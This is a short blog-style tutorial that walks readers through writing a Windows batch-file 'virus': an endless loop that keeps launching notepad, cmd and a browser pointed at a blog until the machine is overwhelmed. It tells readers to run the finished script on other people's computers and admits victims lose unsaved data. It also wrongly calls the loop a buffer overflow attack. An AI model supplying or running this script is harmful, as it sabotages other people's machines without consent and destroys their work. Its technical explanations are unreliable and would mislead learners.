Hello friends, today i am going to tell you a tutorial for creating a computer virus less than a minute. There is no requirement of any programming language for making the virus. Now just follow these simple steps :
- Open notepad ( please save all other work before the development of the virus).
- Now type "@echo off" and create the label by writing any name just after semicolon example:
@echo off
: your_given_name
- After this the real part of virus is come. Actually we are creating the endless cycle of commands which ultimately creates the overflow of the computer buffer and ram.
- Now type the "start" and after start just write the name of any application you want i.e if you want to open the notepad just type "start notepad.exe"
@echo off
: your_given_name
start notepad.exe
start cmd.exe
start iexplore lessonsandprojects.blogspot.com
- The iexplore is used to open the website which you want. Now after this just type "goto your_given_name", this will create the loop of commands and this will create the buffer overflow attack. The final virus code will be ....
@echo off
: your_given_name
start notepad.exe
start cmd.exe
start iexplore lessonsandprojects.blogspot.com
goto your_given_name
- Now save this file with extension of ".bat" batch file and you r virus is ready for use and now you just need to execute this batch file in others computer.
- This virus has only for the temporary effect and after rebooting the system is completely fine but with only the loss of your current unsaved data.
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